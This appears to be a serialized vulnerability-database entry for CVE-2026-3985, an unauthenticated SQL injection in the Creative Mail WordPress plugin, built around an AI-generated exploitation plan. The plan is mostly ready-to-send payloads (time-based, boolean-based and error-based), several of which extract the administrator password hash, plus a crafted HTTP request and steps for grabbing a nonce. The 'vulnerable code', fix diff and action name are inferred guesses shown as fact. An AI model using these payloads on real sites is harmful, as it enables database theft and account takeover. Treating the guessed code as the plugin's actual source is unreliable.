[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ffCdXuTxSfXkkE_TFNXPpGBNqOlCM-z_CfU2SVjnOHJw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-3985","creative-mail-easier-wordpress-woocommerce-email-marketing-unauthenticated-sql-injection-via-checkoutuuid-parameter","Creative Mail – Easier WordPress & WooCommerce Email Marketing \u003C= 1.6.9 - Unauthenticated SQL Injection via 'checkout_uuid' Parameter","The Creative Mail – Easier WordPress & WooCommerce Email Marketing plugin for WordPress is vulnerable to SQL Injection via the 'checkout_uuid' parameter in all versions up to, and including, 1.6.9. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `has_checkout_consent()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","creative-mail-by-constant-contact",null,"\u003C=1.6.9","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-19 12:14:03","2026-05-20 01:25:47",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F39c17935-a853-407f-a99d-3828561919e6?source=api-prod",[],"researched",false,3,"This research plan targets a confirmed SQL Injection vulnerability in the **Creative Mail** plugin (\u003C= 1.6.9). The vulnerability exists in the `has_checkout_consent()` method due to the unsafe handling of the `checkout_uuid` parameter.\n\n---\n\n### 1. Vulnerability Summary\n*   **ID**: CVE-2026-3985\n*   **Vulnerability**: Unauthenticated SQL Injection\n*   **Component**: `has_checkout_consent()` method\n*   **Vulnerable Parameter**: `checkout_uuid`\n*   **Cause**: The plugin retrieves the `checkout_uuid` parameter from a request and interpolates it directly into a SQL query without using `$wpdb->prepare()` or adequate escaping. This allows an attacker to manipulate the query logic.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php` (inferred as the most likely entry point for unauthenticated \"consent\" checks during checkout flows).\n*   **Action**: Likely `creative_mail_check_consent` or a similar action registered via `wp_ajax_nopriv_`.\n*   **Parameter**: `checkout_uuid`\n*   **Authentication**: None required (Unauthenticated).\n*   **Preconditions**: The plugin must be active. WooCommerce integration is likely required for the specific code path to be reachable, as \"checkout consent\" pertains to the WooCommerce checkout process.\n\n### 3. Code Flow (Inferred)\n1.  **Request Entry**: A POST or GET request is sent to `admin-ajax.php` with `action=[ACTION_NAME]` and `checkout_uuid=[PAYLOAD]`.\n2.  **Hook Trigger**: WordPress executes the callback associated with `wp_ajax_nopriv_[ACTION_NAME]`.\n3.  **Controller Logic**: The handler function retrieves `$_REQUEST['checkout_uuid']`.\n4.  **Vulnerable Call**: The handler calls `has_checkout_consent($checkout_uuid)`.\n5.  **SQL Sink**: Inside `has_checkout_consent()`, the code performs a query similar to:\n    ```php\n    $wpdb->get_var(\"SELECT consent FROM {$wpdb->prefix}creative_mail_consents WHERE checkout_uuid = '$checkout_uuid'\");\n    ```\n    Because `$checkout_uuid` is not sanitized or prepared, the single quote can break the string literal.\n\n### 4. Nonce Acquisition Strategy\nWhile many unauthenticated SQLi vulnerabilities in AJAX handlers occur because the nonce check is missing, we must be prepared to extract one if the developer included a CSRF check but failed to secure the SQL query.\n\n1.  **Identify Script Localization**: Search the codebase for `wp_localize_script` to find the JavaScript object name.\n    *   *Search Pattern*: `grep -r \"wp_localize_script\" .`\n2.  **Target Page**: The \"checkout consent\" functionality is typically active on the WooCommerce Checkout page.\n3.  **Extraction Process**:\n    *   Navigate to the checkout page: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fcheckout\u002F\")`\n    *   Extract the nonce (e.g., if the object is `creative_mail_vars`):\n        ```javascript\n        browser_eval(\"window.creative_mail_vars?.ajax_nonce\")\n        ```\n    *   *Note*: If the `wp_ajax_nopriv_` handler does not call `check_ajax_referer()`, this step can be skipped.\n\n### 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** approach to confirm the vulnerability, as it is the most reliable method when the query result is not directly reflected in the response.\n\n#### Step 1: Baseline Request\nDetermine the normal response time.\n*   **Tool**: `http_request`\n*   **Method**: POST\n*   **Body**: `action=[ACTION]&checkout_uuid=test-uuid`\n\n#### Step 2: Verification (Sleep)\nInject a sleep command to confirm the injection.\n*   **Payload**: `test-uuid' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n*   **Encoded Payload**: `test-uuid%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29--%20-`\n*   **Request**:\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=[ACTION]&checkout_uuid=test-uuid%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20-\n    ```\n\n#### Step 3: Data Extraction (Example: Admin Password Hash)\nExtract the first character of the admin user's password hash.\n*   **Payload**: `test-uuid' AND (SELECT 1 FROM (SELECT(IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$',SLEEP(5),0)))a)-- -`\n\n### 6. Test Data Setup\n1.  **Install Dependencies**: Ensure WooCommerce is installed and configured (required for Creative Mail's checkout features).\n2.  **Plugin Setup**: Activate `creative-mail-by-constant-contact`.\n3.  **Identify Action**: Run the following to find the exact AJAX action:\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" .\n    ```\n    Look for a callback that invokes `has_checkout_consent`. Let's assume the action is `creative_mail_check_consent` (inferred).\n\n### 7. Expected Results\n*   **Vulnerable Response**: The HTTP response will be delayed by exactly 5 seconds when the `SLEEP(5)` payload is sent.\n*   **Normal Response**: Immediate response (milliseconds) for the baseline payload.\n*   **Content**: The response body might be `0`, `-1`, or a JSON object, but the timing is the indicator of success.\n\n### 8. Verification Steps (Post-Exploit)\nConfirm the database structure matches our assumptions:\n1.  **Check for Consent Table**: `wp db query \"SHOW TABLES LIKE '%creative_mail_consents%'\" --allow-root`\n2.  **Check for Vulnerable Method**: `grep -rn \"function has_checkout_consent\" .` to confirm the file and line number.\n3.  **Confirm Lack of Prepare**: Check the code inside the identified function to verify `$wpdb->prepare` is not used.\n\n### 9. Alternative Approaches\n*   **Boolean-Based Blind**: If the response body changes (e.g., returns `1` for a found UUID and `0` for not found), use:\n    `checkout_uuid=nonexistent' OR (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')-- -`\n*   **Error-Based**: If `WP_DEBUG` is enabled, attempt to trigger a `GTID_SUBSET` or `XPATH` error to extract data faster.\n    `checkout_uuid=test' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)-- -`","The Creative Mail plugin for WordPress (\u003C= 1.6.9) is vulnerable to unauthenticated SQL injection via the 'checkout_uuid' parameter. This vulnerability exists because the plugin directly interpolates user-supplied input into a database query within the has_checkout_consent() method without using prepared statements or adequate escaping.","\u002F\u002F Inferred from research plan code flow analysis\n\u002F\u002F Located in the handler for checkout consent checks\npublic function has_checkout_consent($checkout_uuid) {\n    global $wpdb;\n    \u002F\u002F Vulnerable SQL query using direct interpolation\n    $wpdb->get_var(\"SELECT consent FROM {$wpdb->prefix}creative_mail_consents WHERE checkout_uuid = '$checkout_uuid'\");\n}","--- a\u002Fincludes\u002Fclass-creative-mail.php\n+++ b\u002Fincludes\u002Fclass-creative-mail.php\n@@ -... @@\n- $wpdb->get_var(\"SELECT consent FROM {$wpdb->prefix}creative_mail_consents WHERE checkout_uuid = '$checkout_uuid'\");\n+ $wpdb->get_var($wpdb->prepare(\n+     \"SELECT consent FROM {$wpdb->prefix}creative_mail_consents WHERE checkout_uuid = %s\",\n+     $checkout_uuid\n+ ));","An unauthenticated attacker can exploit this by sending a request to the WordPress AJAX endpoint (\u002Fwp-admin\u002Fadmin-ajax.php) with an action parameter that invokes the has_checkout_consent() method. By providing a malicious SQL payload in the 'checkout_uuid' parameter (e.g., using time-based blind injection like ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -), the attacker can determine if the query is successful based on the server's response time. This methodology allows for the character-by-character extraction of sensitive data from the database, such as administrator password hashes, without requiring any authentication or valid nonces if the AJAX handler lacks CSRF protection.","gemini-3-flash-preview","2026-05-20 16:45:33","2026-05-20 16:45:49",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcreative-mail-by-constant-contact\u002Ftags"]